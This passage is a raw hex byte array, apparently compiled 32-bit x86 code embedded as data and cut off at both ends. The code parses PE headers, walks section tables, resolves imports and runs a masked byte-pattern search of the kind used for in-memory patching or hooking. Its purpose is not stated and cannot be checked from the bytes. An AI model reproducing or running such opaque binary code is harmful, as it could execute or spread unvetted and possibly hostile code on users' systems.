4,0x24,0xE8,0x03,0x00,0x00,0xFF,0xD6,0x83,0xEC,0x04,0x89,0xD8,0xF0,0x0F,0xB1,0x3D,0x24,0x4A,0x49,0x65,0x85,0xC0,0x75,0xDE,0x31,0xDB,0xA1,0x28,0x4A,0x49,0x65,0x83,0xF8,0x01,0x0F,0x84,0xEE,0x00,0x00,0x00,0xA1,0x28,0x4A,0x49,0x65,0x85,0xC0,0x0F,0x84,0x91,0x00,0x00,0x00,0xA1,0x28,0x4A,0x49,0x65,0x83,0xF8,0x01,0x0F,0x84,0xAB,0x00,0x00,0x00,0x85,0xDB,0x74,0x6F,0xA1,0xC4,0xEC,0x48,0x65,0x85,0xC0,0x74,0x1A,0x8B,0x55,0x10,0xC7,0x44,0x24,0x04,0x02,0x00,0x00,0x00,0x89,0x54,0x24,0x08,0x8B,0x55,0x08,0x89,0x14,0x24,0xFF,0xD0,0x83,0xEC,0x0C,0x83,0x05,0x0C,0x30,0x49,0x65,0x01,0xBA,0x01,0x00,0x00,0x00,0xE9,0x4B,0xFF,0xFF,0xFF,0x8D,0x76,0x00,0xC7,0x04,0x24,0x00,0x30,0x49,0x65,0xE8,0x0C,0xBA,0x00,0x00,0xC7,0x05,0x28,0x4A,0x49,0x65,0x00,0x00,0x00,0x00,0x87,0x1D,0x24,0x4A,0x49,0x65,0xE9,0x22,0xFF,0xFF,0xFF,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0xBB,0x01,0x00,0x00,0x00,0xE9,0x6A,0xFF,0xFF,0xFF,0x8D,0xB6,0x00,0x00,0x00,0x00,0x87,0x1D,0x24,0x4A,0x49,0x65,0xEB,0x89,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0xC7,0x05,0x28,0x4A,0x49,0x65,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x10,0x70,0x49,0x65,0xC7,0x04,0x24,0x08,0x70,0x49,0x65,0xE8,0x32,0xBA,0x00,0x00,0xE9,0x4C,0xFF,0xFF,0xFF,0x2E,0x8D,0x74,0x26,0x00,0xC7,0x44,0x24,0x04,0x04,0x70,0x49,0x65,0xC7,0x04,0x24,0x00,0x70,0x49,0x65,0xE8,0x14,0xBA,0x00,0x00,0xC7,0x05,0x28,0x4A,0x49,0x65,0x02,0x00,0x00,0x00,0xE9,0x32,0xFF,0xFF,0xFF,0x2E,0x8D,0x74,0x26,0x00,0xC7,0x04,0x24,0x1F,0x00,0x00,0x00,0xE8,0xE4,0xB9,0x00,0x00,0xE9,0x0E,0xFF,0xFF,0xFF,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x57,0x89,0xCF,0x56,0x89,0xC6,0x53,0x89,0xD3,0x83,0xEC,0x2C,0x89,0x15,0x88,0xD0,0x48,0x65,0x85,0xD2,0x75,0x77,0xA1,0x0C,0x30,0x49,0x65,0x85,0xC0,0x74,0x4E,0xE8,0x59,0xAB,0x00,0x00,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0x54,0xA7,0x00,0x00,0x83,0xEC,0x0C,0x89,0x7C,0x24,0x08,0x89,0x5C,0x24,0x04,0x89,0x34,0x24,0xE8,0xF2,0xB4,0x00,0x00,0x83,0xEC,0x0C,0x89,0x45,0xE4,0x89,0x7C,0x24,0x08,0x89,0x5C,0x24,0x04,0x89,0x34,0x24,0xE8,0xBC,0xFD,0xFF,0xFF,0x8B,0x55,0xE4,0x83,0xEC,0x0C,0x85,0xC0,0x75,0x04,0x66,0x90,0x31,0xD2,0xC7,0x05,0x88,0xD0,0x48,0x65,0xFF,0xFF,0xFF,0xFF,0x8D,0x65,0xF4,0x89,0xD0,0x5B,0x5E,0x5F,0x5D,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0xE8,0xEB,0xAA,0x00,0x00,0x8D,0x43,0xFF,0x89,0x7C,0x24,0x08,0x89,0x5C,0x24,0x04,0x89,0x34,0x24,0x83,0xF8,0x01,0x77,0x48,0xE8,0x73,0xFD,0xFF,0xFF,0x83,0xEC,0x0C,0x85,0xC0,0x74,0xBC,0x89,0x7C,0x24,0x08,0x89,0x5C,0x24,0x04,0x89,0x34,0x24,0xE8,0x7C,0xB4,0x00,0x00,0x83,0xEC,0x0C,0x85,0xC0,0x74,0x45,0x83,0xFB,0x01,0x74,0x68,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x02,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0xAB,0xA6,0x00,0x00,0x83,0xEC,0x0C,0x89,0xC2,0xEB,0x87,0x2E,0x8D,0x74,0x26,0x00,0xE8,0x9A,0xA6,0x00,0x00,0x83,0xEC,0x0C,0x89,0xC2,0x83,0xFB,0x03,0x0F,0x85,0x6F,0xFF,0xFF,0xFF,0xE9,0x36,0xFF,0xFF,0xFF,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x83,0xFB,0x01,0x0F,0x85,0x57,0xFF,0xFF,0xFF,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0xF3,0xFC,0xFF,0xFF,0x83,0xEC,0x0C,0xE9,0x3B,0xFF,0xFF,0xFF,0x8D,0x76,0x00,0xE8,0x73,0xA7,0x00,0x00,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0x3E,0xA6,0x00,0x00,0x83,0xEC,0x0C,0x89,0xC2,0x85,0xC0,0x0F,0x85,0x14,0xFF,0xFF,0xFF,0x89,0x45,0xE4,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0x1A,0xA6,0x00,0x00,0x83,0xEC,0x0C,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0xB4,0xB3,0x00,0x00,0x83,0xEC,0x0C,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0x7D,0xFC,0xFF,0xFF,0x8B,0x55,0xE4,0x83,0xEC,0x0C,0xE9,0xC4,0xFE,0xFF,0xFF,0x66,0x90,0x55,0x89,0xE5,0x83,0xEC,0x08,0xC7,0x05,0x3C,0x4A,0x49,0x65,0x00,0x00,0x00,0x00,0x8B,0x4D,0x10,0x8B,0x55,0x0C,0x8B,0x45,0x08,0xE8,0x32,0xFE,0xFF,0xFF,0xC9,0xC2,0x0C,0x00,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8D,0xB6,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x83,0xEC,0x18,0x8B,0x45,0x08,0xC7,0x04,0x24,0x00,0x30,0x49,0x65,0x89,0x44,0x24,0x04,0xE8,0x97,0xB6,0x00,0x00,0xC9,0xC3,0x90,0x90,0x90,0x90,0x90,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x1C,0xC7,0x04,0x24,0x00,0xE0,0x48,0x65,0xFF,0x15,0x38,0x61,0x49,0x65,0x83,0xEC,0x04,0x85,0xC0,0x74,0x73,0x89,0xC3,0xC7,0x04,0x24,0x00,0xE0,0x48,0x65,0xFF,0x15,0x5C,0x61,0x49,0x65,0x8B,0x3D,0x40,0x61,0x49,0x65,0x83,0xEC,0x04,0xA3,0x10,0x30,0x49,0x65,0xC7,0x44,0x24,0x04,0x13,0xE0,0x48,0x65,0x89,0x1C,0x24,0xFF,0xD7,0x83,0xEC,0x08,0x89,0xC6,0xC7,0x44,0x24,0x04,0x29,0xE0,0x48,0x65,0x89,0x1C,0x24,0xFF,0xD7,0x83,0xEC,0x08,0xA3,0x04,0xD0,0x48,0x65,0x85,0xF6,0x74,0x11,0xC7,0x44,0x24,0x04,0x14,0x30,0x49,0x65,0xC7,0x04,0x24,0xDC,0x00,0x49,0x65,0xFF,0xD6,0xC7,0x04,0x24,0xA0,0x14,0x48,0x65,0xE8,0x5E,0xFF,0xFF,0xFF,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xC3,0x8D,0xB6,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xBE,0x00,0x00,0x00,0x00,0xEB,0xC0,0x8D,0x74,0x26,0x00,0x55,0x89,0xE5,0x83,0xEC,0x18,0xA1,0x04,0xD0,0x48,0x65,0x85,0xC0,0x74,0x09,0xC7,0x04,0x24,0xDC,0x00,0x49,0x65,0xFF,0xD0,0xA1,0x10,0x30,0x49,0x65,0x85,0xC0,0x74,0x0C,0x89,0x04,0x24,0xFF,0x15,0x30,0x61,0x49,0x65,0x83,0xEC,0x04,0xC9,0xC3,0x90,0x55,0x89,0xE5,0x53,0x83,0xEC,0x14,0x83,0x7D,0x0C,0x00,0x75,0x05,0x8B,0x45,0x0C,0xEB,0x35,0x8B,0x45,0x08,0x8B,0x40,0x20,0x89,0xC1,0x8B,0x45,0x08,0x8B,0x50,0x1C,0x8B,0x40,0x18,0x01,0xC8,0x89,0x45,0xF4,0x8B,0x4D,0x0C,0x8B,0x45,0x08,0x8B,0x40,0x14,0x89,0xC3,0x8B,0x45,0x08,0x8B,0x50,0x1C,0x8B,0x40,0x18,0x01,0xD8,0x89,0xCA,0x29,0xC2,0x8B,0x45,0xF4,0x01,0xD0,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x24,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x4C,0x07,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xFB,0xB6,0x00,0x00,0xC7,0x44,0x24,0x04,0x04,0x01,0x00,0x00,0x8B,0x45,0x0C,0x89,0x04,0x24,0xE8,0x28,0xB2,0x00,0x00,0x8B,0x55,0x08,0x89,0x44,0x24,0x08,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x89,0x14,0x24,0xE8,0x32,0xB7,0x00,0x00,0xC7,0x44,0x24,0x04,0x5C,0x00,0x00,0x00,0x8B,0x45,0x0C,0x89,0x04,0x24,0xE8,0x27,0xB7,0x00,0x00,0x85,0xC0,0x74,0x45,0xC7,0x44,0x24,0x04,0x04,0x01,0x00,0x00,0x8B,0x45,0x0C,0x89,0x04,0x24,0xE8,0xE8,0xB1,0x00,0x00,0x89,0xC3,0xC7,0x44,0x24,0x04,0x5C,0x00,0x00,0x00,0x8B,0x45,0x0C,0x89,0x04,0x24,0xE8,0xFB,0xB6,0x00,0x00,0x8D,0x50,0x02,0x8B,0x45,0x08,0x05,0x08,0x02,0x00,0x00,0x89,0x5C,0x24,0x08,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0xD8,0xB6,0x00,0x00,0xEB,0x2F,0xC7,0x44,0x24,0x04,0x04,0x01,0x00,0x00,0x8B,0x45,0x0C,0x89,0x04,0x24,0xE8,0xA3,0xB1,0x00,0x00,0x8B,0x55,0x08,0x81,0xC2,0x08,0x02,0x00,0x00,0x89,0x44,0x24,0x08,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x89,0x14,0x24,0xE8,0xA7,0xB6,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x30,0x8B,0x45,0x08,0x8B,0x55,0xF4,0x81,0xC2,0x00,0x01,0x00,0x00,0x0F,0xB7,0x44,0x50,0x08,0x66,0x83,0xF8,0x2E,0x75,0x15,0x8B,0x45,0x08,0x8B,0x55,0xF4,0x81,0xC2,0x00,0x01,0x00,0x00,0x66,0xC7,0x44,0x50,0x08,0x00,0x00,0xEB,0x0D,0x83,0x45,0xF4,0x01,0x81,0x7D,0xF4,0x03,0x01,0x00,0x00,0x7E,0xC7,0x8B,0x45,0x08,0x8B,0x55,0x10,0x89,0x90,0x10,0x04,0x00,0x00,0x83,0x7D,0x14,0x00,0x74,0x20,0x8B,0x45,0x08,0x8D,0x90,0x14,0x04,0x00,0x00,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x8B,0x45,0x14,0x89,0x44,0x24,0x04,0x89,0x14,0x24,0xE8,0x0B,0xB6,0x00,0x00,0x8B,0x45,0x08,0x8B,0x55,0x20,0x89,0x90,0x18,0x05,0x00,0x00,0x8B,0x45,0x08,0xC7,0x80,0x1C,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0xC7,0x80,0x20,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0xC7,0x80,0x24,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0xC7,0x80,0x28,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0xC7,0x80,0x2C,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0xC7,0x80,0x30,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x83,0x7D,0x18,0x00,0x74,0x5A,0x83,0x7D,0x1C,0x00,0x74,0x54,0xC7,0x44,0x24,0x04,0xFF,0x00,0x00,0x00,0x8B,0x45,0x18,0x89,0x04,0x24,0xE8,0x6A,0xB0,0x00,0x00,0x89,0x45,0xF0,0x8B,0x45,0x08,0x8D,0x90,0x38,0x05,0x00,0x00,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0x8B,0x45,0x18,0x89,0x44,0x24,0x04,0x89,0x14,0x24,0xE8,0x30,0xB5,0x00,0x00,0x8B,0x45,0x08,0x8D,0x90,0x38,0x06,0x00,0x00,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0x8B,0x45,0x1C,0x89,0x44,0x24,0x04,0x89,0x14,0x24,0xE8,0x11,0xB5,0x00,0x00,0x8B,0x45,0x08,0xC7,0x80,0x38,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0xC7,0x80,0x44,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0xC7,0x80,0x48,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x90,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0xEB,0x2D,0x8B,0x45,0x10,0x0F,0xB6,0x00,0x3C,0x78,0x75,0x17,0x8B,0x45,0x08,0x0F,0xB6,0x10,0x8B,0x45,0x0C,0x0F,0xB6,0x00,0x38,0xC2,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x1B,0x83,0x45,0x10,0x01,0x83,0x45,0x08,0x01,0x83,0x45,0x0C,0x01,0x8B,0x45,0x10,0x0F,0xB6,0x00,0x84,0xC0,0x75,0xC9,0xB8,0x01,0x00,0x00,0x00,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x1C,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x3B,0x8B,0x55,0x08,0x8B,0x45,0xFC,0x01,0xD0,0x89,0x45,0xF8,0x8B,0x45,0x14,0x89,0x44,0x24,0x08,0x8B,0x45,0x10,0x89,0x44,0x24,0x04,0x8B,0x45,0xF8,0x89,0x04,0x24,0xE8,0x83,0xFF,0xFF,0xFF,0x85,0xC0,0x74,0x0F,0x8B,0x45,0x18,0x8B,0x55,0xF8,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x11,0x83,0x45,0xFC,0x01,0x8B,0x45,0xFC,0x3B,0x45,0x0C,0x72,0xBD,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8D,0x50,0x01,0x89,0x55,0xF4,0x69,0xD0,0x4C,0x07,0x00,0x00,0x8B,0x45,0x08,0x01,0xD0,0xC7,0x44,0x24,0x18,0x06,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x44,0xE0,0x48,0x65,0xC7,0x44,0x24,0x10,0x4C,0xE0,0x48,0x65,0xC7,0x44,0x24,0x0C,0x54,0xE0,0x48,0x65,0xC7,0x44,0x24,0x08,0x26,0xD4,0x95,0xF4,0xC7,0x44,0x24,0x04,0x6A,0xE0,0x48,0x65,0x89,0x04,0x24,0xE8,0xCC,0xFC,0xFF,0xFF,0x8B,0x45,0xF4,0x8D,0x50,0x01,0x89,0x55,0xF4,0x69,0xD0,0x4C,0x07,0x00,0x00,0x8B,0x45,0x08,0x01,0xD0,0xC7,0x44,0x24,0x18,0x08,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x88,0xE0,0x48,0x65,0xC7,0x44,0x24,0x10,0x4C,0xE0,0x48,0x65,0xC7,0x44,0x24,0x0C,0x90,0xE0,0x48,0x65,0xC7,0x44,0x24,0x08,0xBC,0x8F,0x3E,0xA6,0xC7,0x44,0x24,0x04,0xA4,0xE0,0x48,0x65,0x89,0x04,0x24,0xE8,0x80,0xFC,0xFF,0xFF,0x8B,0x45,0xF4,0x8D,0x50,0x01,0x89,0x55,0xF4,0x69,0xD0,0x4C,0x07,0x00,0x00,0x8B,0x45,0x08,0x01,0xD0,0xC7,0x44,0x24,0x18,0x08,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0xBE,0xE0,0x48,0x65,0xC7,0x44,0x24,0x10,0x4C,0xE0,0x48,0x65,0xC7,0x44,0x24,0x0C,0xC6,0xE0,0x48,0x65,0xC7,0x44,0x24,0x08,0x87,0x5A,0x1C,0x55,0xC7,0x44,0x24,0x04,0xDA,0xE0,0x48,0x65,0x89,0x04,0x24,0xE8,0x34,0xFC,0xFF,0xFF,0x8B,0x45,0x0C,0x8B,0x55,0xF4,0x89,0x10,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8D,0x50,0x01,0x89,0x55,0xF4,0x69,0xD0,0x4C,0x07,0x00,0x00,0x8B,0x45,0x08,0x01,0xD0,0xC7,0x44,0x24,0x18,0x08,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x88,0xE0,0x48,0x65,0xC7,0x44,0x24,0x10,0x4C,0xE0,0x48,0x65,0xC7,0x44,0x24,0x0C,0x90,0xE0,0x48,0x65,0xC7,0x44,0x24,0x08,0xBC,0x8F,0x3E,0xA6,0xC7,0x44,0x24,0x04,0xA4,0xE0,0x48,0x65,0x89,0x04,0x24,0xE8,0xD0,0xFB,0xFF,0xFF,0x8B,0x45,0xF4,0x8D,0x50,0x01,0x89,0x55,0xF4,0x69,0xD0,0x4C,0x07,0x00,0x00,0x8B,0x45,0x08,0x01,0xD0,0xC7,0x44,0x24,0x18,0x08,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0xBE,0xE0,0x48,0x65,0xC7,0x44,0x24,0x10,0x4C,0xE0,0x48,0x65,0xC7,0x44,0x24,0x0C,0xC6,0xE0,0x48,0x65,0xC7,0x44,0x24,0x08,0x87,0x5A,0x1C,0x55,0xC7,0x44,0x24,0x04,0xDA,0xE0,0x48,0x65,0x89,0x04,0x24,0xE8,0x84,0xFB,0xFF,0xFF,0x8B,0x45,0x0C,0x8B,0x55,0xF4,0x89,0x10,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x8B,0x40,0x3C,0x89,0xC2,0x8B,0x45,0xEC,0x01,0xD0,0x89,0x45,0xE8,0x8B,0x45,0xE8,0x83,0xC0,0x18,0x89,0xC2,0x8B,0x45,0xE8,0x0F,0xB7,0x40,0x14,0x0F,0xB7,0xC0,0x01,0xD0,0x89,0x45,0xE4,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xEB,0x74,0x8B,0x55,0xF0,0x89,0xD0,0xC1,0xE0,0x02,0x01,0xD0,0xC1,0xE0,0x03,0x89,0xC2,0x8B,0x45,0xE4,0x01,0xD0,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xEE,0xE0,0x48,0x65,0xE8,0x41,0xB2,0x00,0x00,0x85,0xC0,0x75,0x48,0x8B,0x55,0xF0,0x89,0xD0,0xC1,0xE0,0x02,0x01,0xD0,0xC1,0xE0,0x03,0x89,0xC2,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x50,0x0C,0x8B,0x45,0x08,0x01,0xD0,0x89,0xC2,0x8B,0x45,0x0C,0x89,0x10,0x8B,0x55,0xF0,0x89,0xD0,0xC1,0xE0,0x02,0x01,0xD0,0xC1,0xE0,0x03,0x89,0xC2,0x8B,0x45,0xE4,0x01,0xD0,0x8B,0x50,0x10,0x8B,0x45,0x10,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x17,0x83,0x45,0xF0,0x01,0x8B,0x45,0xE8,0x0F,0xB7,0x40,0x06,0x0F,0xB7,0xC0,0x39,0x45,0xF0,0x0F,0x82,0x79,0xFF,0xFF,0xFF,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x44,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x9F,0x3E,0x00,0x00,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x84,0xEE,0x01,0x00,0x00,0x8D,0x45,0xDC,0x89,0x44,0x24,0x08,0x8D,0x45,0xE0,0x89,0x44,0x24,0x04,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0xA4,0xFE,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xCB,0x01,0x00,0x00,0x8B,0x55,0xE0,0x8B,0x45,0x08,0x89,0x90,0x24,0x05,0x00,0x00,0x8B,0x45,0x08,0x0F,0xB6,0x80,0x14,0x04,0x00,0x00,0x84,0xC0,0x75,0x0D,0x8B,0x45,0x08,0x8B,0x80,0x10,0x04,0x00,0x00,0x85,0xC0,0x74,0x7F,0x8B,0x45,0x08,0x0F,0xB6,0x80,0x14,0x04,0x00,0x00,0x84,0xC0,0x74,0x2C,0x8B,0x45,0x08,0x05,0x14,0x04,0x00,0x00,0x89,0x04,0x24,0xE8,0xC1,0x6F,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x89,0x44,0x24,0x04,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0x97,0x3C,0x00,0x00,0x89,0x45,0xF0,0xEB,0x23,0x8B,0x45,0x08,0x8B,0x80,0x10,0x04,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x89,0x44,0x24,0x04,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0x72,0x3C,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x40,0x01,0x00,0x00,0x8B,0x45,0x08,0x8B,0x55,0xF0,0x89,0x90,0x24,0x05,0x00,0x00,0x8B,0x45,0x08,0x8B,0x55,0xF0,0x89,0x90,0x3C,0x07,0x00,0x00,0x8B,0x45,0x08,0x0F,0xB6,0x80,0x38,0x05,0x00,0x00,0x84,0xC0,0x74,0x6D,0x8B,0x45,0xE0,0x89,0xC2,0x8B,0x45,0x08,0x8B,0x80,0x24,0x05,0x00,0x00,0x29,0xC2,0x8B,0x45,0xDC,0x01,0xD0,0x83,0xE8,0x01,0x89,0x45,0xE4,0x8B,0x45,0x08,0x8D,0x98,0x38,0x05,0x00,0x00,0x8B,0x45,0x08,0x8D,0x88,0x38,0x06,0x00,0x00,0x8B,0x45,0x08,0x8B,0x80,0x24,0x05,0x00,0x00,0x8D,0x55,0xD8,0x89,0x54,0x24,0x10,0x89,0x5C,0x24,0x0C,0x89,0x4C,0x24,0x08,0x8B,0x55,0xE4,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x83,0xFB,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xBC,0x00,0x00,0x00,0x8B,0x55,0xD8,0x8B,0x45,0x08,0x89,0x90,0x24,0x05,0x00,0x00,0x8B,0x45,0x08,0x8B,0x80,0x18,0x05,0x00,0x00,0x85,0xC0,0x74,0x4A,0x8B,0x45,0xE0,0x89,0xC2,0x8B,0x45,0x08,0x8B,0x80,0x24,0x05,0x00,0x00,0x29,0xC2,0x8B,0x45,0xDC,0x01,0xD0,0x83,0xE8,0x01,0x89,0x45,0xE4,0x8B,0x45,0x08,0x8B,0x80,0x18,0x05,0x00,0x00,0x39,0x45,0xE4,0x72,0x7D,0x8B,0x45,0x08,0x8B,0x80,0x24,0x05,0x00,0x00,0x89,0xC2,0x8B,0x45,0x08,0x8B,0x80,0x18,0x05,0x00,0x00,0x01,0xD0,0x89,0xC2,0x8B,0x45,0x08,0x89,0x90,0x24,0x05,0x00,0x00,0x8B,0x45,0x08,0x8B,0x80,0x3C,0x07,0x00,0x00,0x85,0xC0,0x74,0x21,0x8B,0x45,0x08,0x8B,0x80,0x24,0x05,0x00,0x00,0x89,0xC2,0x8B,0x45,0x08,0x8B,0x80,0x3C,0x07,0x00,0x00,0x29,0xC2,0x8B,0x45,0x08,0x89,0x90,0x40,0x07,0x00,0x00,0xEB,0x19,0x8B,0x45,0x08,0x8B,0x80,0x24,0x05,0x00,0x00,0x89,0xC2,0x8B,0x45,0xE8,0x29,0xC2,0x8B,0x45,0x08,0x89,0x90,0x40,0x07,0x00,0x00,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x8B,0x45,0x08,0xC7,0x80,0x1C,0x05,0x00,0x00,0x70,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x6B,0x8B,0x45,0xF4,0x69,0xD0,0x4C,0x07,0x00,0x00,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xEC,0x8B,0x45,0xEC,0xC7,0x80,0x38,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x41,0xFD,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x31,0x8B,0x45,0x0C,0x89,0x44,0x24,0x08,0x8B,0x45,0xF4,0x89,0x44,0x24,0x04,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x81,0xFF,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x12,0x8B,0x45,0xEC,0xC7,0x80,0x38,0x07,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xF4,0x01,0x8B,0x45,0xF4,0x3B,0x45,0x0C,0x72,0x8D,0x90,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x8B,0x45,0x08,0x8B,0x40,0x24,0x83,0xE8,0x04,0x89,0xC2,0x8B,0x45,0x08,0x89,0x50,0x24,0x8B,0x45,0x08,0x8B,0x40,0x24,0x8B,0x55,0x0C,0x89,0x10,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x18,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x8B,0x45,0x10,0xC7,0x40,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0x10,0x89,0x04,0x24,0xE8,0xB4,0xFF,0xFF,0xFF,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xE9,0x8D,0x00,0x00,0x00,0x8B,0x45,0x0C,0x2B,0x45,0xFC,0x69,0xC0,0x4C,0x07,0x00,0x00,0x8D,0x90,0xB4,0xF8,0xFF,0xFF,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x8B,0x80,0x38,0x07,0x00,0x00,0x85,0xC0,0x74,0x61,0x8B,0x45,0x10,0x8B,0x40,0x28,0x89,0x44,0x24,0x04,0x8B,0x45,0x10,0x89,0x04,0x24,0xE8,0xA8,0xF6,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0x10,0x89,0x04,0x24,0xE8,0x5D,0xFF,0xFF,0xFF,0x8B,0x4